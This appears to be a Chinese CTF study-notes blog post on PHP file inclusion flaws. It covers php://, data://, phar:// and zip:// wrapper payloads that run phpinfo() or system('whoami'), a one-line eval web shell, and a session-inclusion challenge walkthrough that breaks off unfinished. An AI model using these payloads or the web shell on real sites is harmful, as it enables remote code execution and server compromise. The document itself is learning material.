

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/fluid.png">
  <link rel="icon" href="/imags/world.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="everythingis-ok">
  <meta name="keywords" content="">
  
    <meta name="description" content="文件包含漏洞学习1.文件包含漏洞概述和SQL注入等攻击方式一样，文件包含漏洞也是一种注入型漏洞，其本质就是输入一段用户能够控制的脚本或者代码，并让服务端执行。 什么叫包含呢？以PHP为例，我们常常把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程叫做包含。 以PHP为例,常用的文件包含函数有以下四种include(),require(),include">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含漏洞学习">
<meta property="og:url" content="http://example.com/2025/10/16/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/index.html">
<meta property="og:site_name" content="haomeng&#39;s blog^^">
<meta property="og:description" content="文件包含漏洞学习1.文件包含漏洞概述和SQL注入等攻击方式一样，文件包含漏洞也是一种注入型漏洞，其本质就是输入一段用户能够控制的脚本或者代码，并让服务端执行。 什么叫包含呢？以PHP为例，我们常常把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程叫做包含。 以PHP为例,常用的文件包含函数有以下四种include(),require(),include">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="d:\work\temp\PixPin_2025-09-09_17-55-36.png">
<meta property="og:image" content="d:\work\temp\PixPin_2025-09-09_19-28-40.png">
<meta property="og:image" content="d:\work\notebook\ontebook\CTF\web%E5%AD%A6%E4%B9%A0\%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB%E6%BC%8F%E6%B4%9E\assets\PixPin_2025-09-10_21-42-06.png">
<meta property="article:published_time" content="2025-10-16T12:38:06.000Z">
<meta property="article:modified_time" content="2025-10-16T12:41:40.219Z">
<meta property="article:author" content="everythingis-ok">
<meta property="article:tag" content="文件包含">
<meta property="article:tag" content="php伪协议">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="d:\work\temp\PixPin_2025-09-09_17-55-36.png">
  
  
  
  <title>文件包含漏洞学习 - haomeng&#39;s blog^^</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>everythingis-ok</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/images/zi.png') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="文件包含漏洞学习"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-10-16 20:38" pubdate>
          2025年10月16日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          4.1k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          34 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">文件包含漏洞学习</h1>
            
            
              <div class="markdown-body">
                
                <h1 id="文件包含漏洞学习"><a href="#文件包含漏洞学习" class="headerlink" title="文件包含漏洞学习"></a>文件包含漏洞学习</h1><h2 id="1-文件包含漏洞概述"><a href="#1-文件包含漏洞概述" class="headerlink" title="1.文件包含漏洞概述"></a>1.文件包含漏洞概述</h2><p>和SQL注入等攻击方式一样，文件包含漏洞也是一种注入型漏洞，其本质就是输入一段用户能够控制的脚本或者代码，并让服务端执行。</p>
<p>什么叫包含呢？以PHP为例，我们常常把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程叫做包含。</p>
<p>以PHP为例,常用的文件包含函数有以下四种<br>include(),require(),include_once(),require_once()</p>
<p>区别如下:</p>
<p>require():找不到被包含的文件会产生致命错误，并停止脚本运行<br>include():找不到被包含的文件只会产生警告，脚本继续执行<br>require_once()与require()类似:唯一的区别是如果该文件的代码已经被包含，则不会再次包含<br>include_once()与include()类似:唯一的区别是如果该文件的代码已经被包含，则不会再次包含</p>
<p>漏洞成因为：当利用这四个函数来包含文件时，不管文件是什么类型（图片、txt等等），都会直接作为php文件进行解析。</p>
<p>利用这个特性，我们可以读取包含敏感信息的文件。</p>
<h2 id="2-本地文件包含LFI-Local-File-Inclusion"><a href="#2-本地文件包含LFI-Local-File-Inclusion" class="headerlink" title="2.本地文件包含LFI(Local File Inclusion)"></a>2.本地文件包含LFI(Local File Inclusion)</h2><p>本地文件包含漏洞，顾名思义，指的是能打开并包含本地文件的漏洞。大部分情况下遇到的文件包含漏洞都是LFI。</p>
<h2 id="3-远程文件包含RFI-Remote-File-Inclusion"><a href="#3-远程文件包含RFI-Remote-File-Inclusion" class="headerlink" title="3.远程文件包含RFI(Remote File Inclusion)"></a>3.远程文件包含RFI(Remote File Inclusion)</h2><p>远程文件包含漏洞。是指能够包含远程服务器上的文件并执行。由于远程服务器的文件是我们可控的，因此漏洞一旦存在危害性会很大。<br>但RFI的利用条件较为苛刻，需要php.ini中进行配置</p>
<ol>
<li>allow_url_fopen &#x3D; On</li>
<li>allow_url_include &#x3D; On</li>
</ol>
<p>两个配置选项均需要为On，才能远程包含文件成功。</p>
<p>在php.ini中，allow_url_fopen默认一直是On，而allow_url_include从php5.2之后就默认为Off。</p>
<h2 id="4-包含姿势"><a href="#4-包含姿势" class="headerlink" title="4.包含姿势"></a>4.包含姿势</h2><h3 id="file-协议"><a href="#file-协议" class="headerlink" title="file:&#x2F;&#x2F;协议"></a>file:&#x2F;&#x2F;协议</h3><p>**file:&#x2F;&#x2F;**用于访问本地文件系统，在CTF中通常用来读取本地文件的且不受allow_url_fopen与allow_url_include的影响。</p>
<p>姿势：</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs delphi"><span class="hljs-keyword">file</span>:<span class="hljs-comment">// [文件的绝对路径和文件名]</span><br></code></pre></td></tr></table></figure>



<h3 id="php-协议"><a href="#php-协议" class="headerlink" title="php:&#x2F;&#x2F;协议"></a>php:&#x2F;&#x2F;协议</h3><h4 id="php-input"><a href="#php-input" class="headerlink" title="php:&#x2F;&#x2F;input"></a>php:&#x2F;&#x2F;input</h4><p><strong>php:&#x2F;&#x2F;input</strong>可以访问请求的原始数据的只读流, 将post请求中的数据作为PHP代码执行。当传入的参数作为文件名打开时，可以将参数设为php:&#x2F;&#x2F;input,同时post想设置的文件内容，php执行时会将post内容当作文件内容。从而导致任意代码执行。</p>
<p>利用条件：</p>
<ol>
<li>allow_url_include &#x3D; On。</li>
<li>对allow_url_fopen不做要求。</li>
</ol>
<p>姿势：</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs delphi"><span class="hljs-keyword">index</span>.php<br>?<span class="hljs-keyword">file</span>=php:<span class="hljs-comment">//input</span><br><br>POST:<br>&lt;? phpinfo();?&gt;<br></code></pre></td></tr></table></figure>



<h4 id="php-filter"><a href="#php-filter" class="headerlink" title="php:&#x2F;&#x2F;filter"></a>php:&#x2F;&#x2F;filter</h4><p><strong>php:&#x2F;&#x2F;filter</strong>读取源代码并进行base64编码输出，不然会直接当做php代码执行就看不到源代码内容了。</p>
<p>利用条件：无甚</p>
<p>姿势：</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-built_in">index</span>.php?<span class="hljs-keyword">file</span>=php://<span class="hljs-built_in">filter</span>/<span class="hljs-keyword">read</span>=convert.base64-encode/resource=<span class="hljs-built_in">index</span>.php<br></code></pre></td></tr></table></figure>



<p>通过指定末尾的文件，可以读取经base64加密后的文件源码，之后再base64解码一下就行。</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">&gt;&gt;&gt; import base64</span><br><span class="language-xml">&gt;&gt;&gt; base64.b64decode(&quot;PD9waHAgDQoJJGZpbGUgPSAkX0dFVFsnZmlsZSddOw0KCWluY2x1ZGUgJGZpbGU7DQo/Pg==&quot;)</span><br><span class="language-xml">b&quot;</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> \r\n\t<span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>];\r\n\tinclude <span class="hljs-variable">$file</span>;\r\n<span class="hljs-meta">?&gt;</span></span><span class="language-xml">&quot;</span><br></code></pre></td></tr></table></figure>



<p>其他姿势：</p>
<figure class="highlight vim"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs vim"><span class="hljs-built_in">index</span>.php?<span class="hljs-keyword">file</span>=php://<span class="hljs-built_in">filter</span>/convert.base64-encode/resource=<span class="hljs-built_in">index</span>.php<br></code></pre></td></tr></table></figure>

<p>效果跟前面一样，少了read等关键字。在绕过一些waf时也许有用。</p>
<h4 id="phar"><a href="#phar" class="headerlink" title="phar:&#x2F;&#x2F;"></a>phar:&#x2F;&#x2F;</h4><p>phar就是php压缩文档。它可以把多个文件归档到同一个文件中，而且不经过解压就能被 php 访问并执行，与file:&#x2F;&#x2F; php:&#x2F;&#x2F;等类似，也是一种流包装器。</p>
<p>使用<code>Phar://</code>伪协议流可以Bypass一些上传的waf，大多数情况下和文件包含一起使用，就类似于我们的压缩包（其实就是一个压缩包），只不过我们换了一种方式去执行而已</p>
<p>写一段小代码测试一下：<br>test.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&quot;cmd&quot;</span>]);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>然后将test.php压缩为test.zip，将压缩文件改后缀为<code>.jpg</code><br>index.php</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span> <br><span class="hljs-keyword">include</span>(<span class="hljs-string">&#x27;phar://./test.jpg/test.php&#x27;</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>成功包含</p>
<p><img src="D:\work\temp\PixPin_2025-09-09_17-55-36.png" srcset="/img/loading.gif" lazyload alt="PixPin_2025-09-09_17-55-36"></p>
<p>利用条件：</p>
<ol>
<li>php版本大于等于php5.3.0</li>
</ol>
<p>姿势：</p>
<p>假设有个文件phpinfo.txt，其内容为<code>&lt;?php phpinfo(); ?&gt;</code>，打包成zip压缩包，如下：</p>
<p>指定绝对路径</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">index.php?file=phar:<span class="hljs-regexp">//</span>D:<span class="hljs-regexp">/phpStudy/</span>WWW<span class="hljs-regexp">/fileinclude/</span>test.zip/phpinfo.txt<br></code></pre></td></tr></table></figure>



<p>或者使用相对路径（这里test.zip就在当前目录下）</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs delphi"><span class="hljs-keyword">index</span>.php?<span class="hljs-keyword">file</span>=phar:<span class="hljs-comment">//test.zip/phpinfo.txt</span><br></code></pre></td></tr></table></figure>

<h3 id="zip-协议"><a href="#zip-协议" class="headerlink" title="zip:&#x2F;&#x2F;协议"></a>zip:&#x2F;&#x2F;协议</h3><p>利用条件：</p>
<ol>
<li>php版本大于等于php5.3.0</li>
</ol>
<p>姿势：<br>构造zip包的方法同phar。</p>
<p>但使用zip协议，需要指定<strong>绝对路径</strong>，同时将<code>#</code>编码为<code>%23</code>，之后填上压缩包内的文件。</p>
<figure class="highlight delphi"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs delphi"><span class="hljs-keyword">index</span>.php?<span class="hljs-keyword">file</span>=zip:<span class="hljs-comment">//D:\phpStudy\WWW\fileinclude\test.zip%23phpinfo.txt</span><br></code></pre></td></tr></table></figure>



<h3 id="date-协议"><a href="#date-协议" class="headerlink" title="date:&#x2F;&#x2F;协议"></a>date:&#x2F;&#x2F;协议</h3><p>data:&#x2F;&#x2F; 同样类似与php:&#x2F;&#x2F;input，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data:&#x2F;&#x2F;流会被当作php文件执行。从而导致任意代码执行。</p>
<p>利用data:&#x2F;&#x2F; 伪协议可以直接达到执行php代码的效果，例如执行phpinfo()函数：</p>
<p>利用条件:</p>
<ol>
<li><p>php版本大于等于php5.2</p>
</li>
<li><p>allow_url_fopen ：on</p>
</li>
<li><p>allow_url_include：on</p>
</li>
</ol>
<p>姿势一：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">index.php?file=data:text/plain,<span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">phpinfo</span>();<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>执行命令：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php">index.php?file=data:text/plain,<span class="hljs-meta">&lt;?php</span> <span class="hljs-title function_ invoke__">system</span>(<span class="hljs-string">&#x27;whoami&#x27;</span>);<span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>



<p>姿势二：</p>
<figure class="highlight fortran"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs fortran"><span class="hljs-built_in">index</span>.php?<span class="hljs-keyword">file</span>=<span class="hljs-keyword">data</span>:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%<span class="hljs-number">2</span>b<br></code></pre></td></tr></table></figure>

<p>加号<code>+</code>的url编码为<code>%2b</code>，<code>PD9waHAgcGhwaW5mbygpOz8+</code>的base64解码为：<code>&lt;?php phpinfo();?&gt;</code></p>
<p>执行命令：</p>
<figure class="highlight fortran"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs fortran"><span class="hljs-built_in">index</span>.php?<span class="hljs-keyword">file</span>=<span class="hljs-keyword">data</span>:text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==<br></code></pre></td></tr></table></figure>

<p>其中<code>PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==</code>的base64解码为：<code>&lt;?php system(&#39;whoami&#39;);?&gt;</code></p>
<h3 id="session文件包含"><a href="#session文件包含" class="headerlink" title="session文件包含"></a>session文件包含</h3><p>利用条件：session文件路径已知，且其中内容部分可读写。</p>
<p>姿势：</p>
<p>php的session文件的保存路径可以在phpinfo的session.save_path看到</p>
<p>常见的php-session存放位置：</p>
<ol>
<li>&#x2F;var&#x2F;lib&#x2F;php&#x2F;sess_PHPSESSID</li>
<li>&#x2F;var&#x2F;lib&#x2F;php&#x2F;sess_PHPSESSID</li>
<li>&#x2F;tmp&#x2F;sess_PHPSESSID</li>
<li>&#x2F;tmp&#x2F;sessions&#x2F;sess_PHPSESSID</li>
</ol>
<p>session的文件名格式为sess_[phpsessid]。而phpsessid在发送的请求的cookie字段中可以看到。</p>
<p>要包含并利用的话，需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候，可以先包含进session文件，观察里面的内容，然后根据里面的字段来发现可控的变量，从而利用变量来写入payload，并之后再次包含从而执行php代码.</p>
<h4 id="例题"><a href="#例题" class="headerlink" title="例题"></a>例题</h4><p>题目：<a target="_blank" rel="noopener" href="https://chybeta.github.io/2017/11/09/%E4%B8%80%E9%81%93CTF%E9%A2%98%EF%BC%9APHP%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">一道CTF题：PHP文件包含 | Chybeta</a></p>
<p>首先用php:&#x2F;&#x2F;filter伪协议读取到代码，</p>
<p>题目涉及到登陆注册界面，先考虑sql注入，往往注册与登陆操作中会有与数据库交互的地方也是sql注入的常见引发点。</p>
<p>register.php源代码</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs autoit"><span class="hljs-meta"># register.php</span><br><br>$mysqli-&gt;set_charset(<span class="hljs-string">&quot;utf8&quot;</span>)<span class="hljs-comment">;</span><br>$sql = <span class="hljs-string">&quot;select * from user where username=?&quot;</span><span class="hljs-comment">;</span><br>$stmt = $mysqli-&gt;prepare($sql)<span class="hljs-comment">;</span><br>$stmt-&gt;bind_param(<span class="hljs-string">&quot;s&quot;</span>, $username)<span class="hljs-comment">;</span><br>$stmt-&gt;bind_result($res_id, $res_username, $res_password)<span class="hljs-comment">;</span><br>$stmt-&gt;<span class="hljs-built_in">execute</span>()<span class="hljs-comment">;</span><br>$stmt-&gt;store_result()<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>



<p>再看一下login.php源代码</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs autoit"><span class="hljs-meta"># login.php</span><br><br>$sql = <span class="hljs-string">&quot;select password from user where username=?&quot;</span><span class="hljs-comment">;</span><br>$stmt = $mysqli-&gt;prepare($sql)<span class="hljs-comment">;</span><br>$stmt-&gt;bind_param(<span class="hljs-string">&quot;s&quot;</span>, $username)<span class="hljs-comment">;</span><br>$stmt-&gt;bind_result($res_password)<span class="hljs-comment">;</span><br>$stmt-&gt;<span class="hljs-built_in">execute</span>()<span class="hljs-comment">;</span><br>$stmt-&gt;fetch()<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p>数据库连接部分使用了mysqli预处理。</p>
<p>只要用了 <strong>预处理语句（prepare + bind_param&#x2F;execute）</strong>，就能大幅降低 SQL 注入风险。</p>
<p>接着再看看，有哪些参数是可控的。</p>
<p>在login.php中：</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-comment"># 第3行</span><br>session_start();<br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;username&#x27;</span>]) &#123;<br>	header(<span class="hljs-string">&#x27;Location: index.php&#x27;</span>);<br>	<span class="hljs-keyword">exit</span>;<br>&#125;<br><span class="hljs-comment"># 第8行</span><br><span class="hljs-keyword">if</span>(<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;username&#x27;</span>] &amp;&amp; <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;password&#x27;</span>]) &#123;<br>	<span class="hljs-variable">$username</span> = <span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;username&#x27;</span>];<br><br><span class="hljs-comment"># 第20行</span><br>	<span class="hljs-variable">$stmt</span>-&gt;bind_result(<span class="hljs-variable">$res_password</span>);<br><span class="hljs-comment"># 第24行</span><br>	<span class="hljs-keyword">if</span> (<span class="hljs-variable">$res_password</span> == <span class="hljs-variable">$password</span>) &#123;<br>		<span class="hljs-variable">$_SESSION</span>[<span class="hljs-string">&#x27;username&#x27;</span>] = base64_encode(<span class="hljs-variable">$username</span>);<br>		header(<span class="hljs-string">&quot;location:index.php&quot;</span>);<br></code></pre></td></tr></table></figure>



<p>这里使用了session来保存用户会话</p>
<p>变量<code>$username</code>是我们可控的，并且被设置到了<code>$_SESSION</code>中，因此我们输入的数据未经过滤的就被写入到了对应的sessioin文件中。结合前面的php文件包含，可以推测这里可以包含session文件</p>
<p>要包含session文件，需要知道文件的路径。常见的php-session存放位置在前文已经列举过了。</p>
<p>能包含，并且控制session文件，但要写入可用的payload，还需要绕过：</p>
<figure class="highlight autoit"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs autoit">$_SESSION[<span class="hljs-string">&#x27;username&#x27;</span>] = base64_encode($username)<span class="hljs-comment">;</span><br></code></pre></td></tr></table></figure>

<p>输入的用户名会被base64加密。如果直接用php伪协议来解密整个session文件，由于序列化的前缀，势必导致乱码。</p>
<p>考虑一下base64的编码过程。比如编码abc。</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs dns">未编码: abc<br>转成ascii码： <span class="hljs-number">97</span> <span class="hljs-number">98</span> <span class="hljs-number">99</span><br>转成对应二进制（三组，每组<span class="hljs-number">8</span>位）： <span class="hljs-number">01100001</span> <span class="hljs-number">01100010</span> <span class="hljs-number">01100011</span><br>重分组（四组，每组<span class="hljs-number">6</span>位）： <span class="hljs-number">011000</span> <span class="hljs-number">010110</span> <span class="hljs-number">001001</span> <span class="hljs-number">100011</span><br>每组高位补零，变为每组<span class="hljs-number">8</span>位：<span class="hljs-number">00011000</span> <span class="hljs-number">00010110</span> <span class="hljs-number">00001001</span> <span class="hljs-number">00100011</span><br>每组对应转为十进制： <span class="hljs-number">24 22 9 35</span><br>查表得： Y W J j<br></code></pre></td></tr></table></figure>



<p>PHP 在保存到 session 文件时会序列化成：</p>
<figure class="highlight 1c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs 1c">username<span class="hljs-string">|s:12:&quot;</span>QUJDREVGR0g<span class="hljs-punctuation">=</span><span class="hljs-string">&quot;;</span><br></code></pre></td></tr></table></figure>

<ul>
<li><code>username|s:12:&quot;</code> → 这是 <strong>前缀</strong>，描述键名和字符串长度。</li>
<li><code>QUJDREVGR0g=</code> → 这是 base64 编码后的内容。</li>
<li><code>&quot;;</code> → 结束符。</li>
</ul>
<p>考虑一下session的前缀：<code>username|s:12:&quot;</code>，中间的数字12表示后面base64串的长度。当base64串的长度小于100时，前缀的长度固定为15个字符，当base64串的长度大于100小于1000时，前缀的长度固定为16个字符。</p>
<p>由于16个字符，恰好满足一下条件：</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">16</span>个字符 =&gt; <span class="hljs-number">16</span> * <span class="hljs-number">6</span> = <span class="hljs-number">96</span> 位 =&gt; <span class="hljs-number">96</span> mod <span class="hljs-number">8</span> = <span class="hljs-number">0</span><br></code></pre></td></tr></table></figure>

<p>再解释一下上面的式子： </p>
<ul>
<li>原始数据是按 <strong>8 位（1字节）</strong>存储的。</li>
<li>Base64 编码时，把原始比特流切成 <strong>6 位一组</strong>。</li>
<li>每一组 6 位再映射成一个 Base64 字符。</li>
</ul>
<p>所以，<strong>1 个 Base64 字符代表 6 位信息</strong>。</p>
<p>原始数据是按字节（8 位）存储的，但编码结果是按 6 位分组的。<br> 为了不丢信息，Base64 要保证：</p>
<blockquote>
<p>用 N 个 6 位分组拼起来时，能正好覆盖某个整数个字节（8 位一组）。</p>
</blockquote>
<p>这就等价于：<br>$$<br>N×6≡0(mod8)N<br>$$</p>
<p>也就是说，当对session文件进行base64解密时，前16个字符固然被解密为乱码，但不会再影响从第17个字符后的部分也就是base64加密后的username。</p>
<p><strong>Get Flag</strong></p>
<p>注册一个账号，比如：</p>
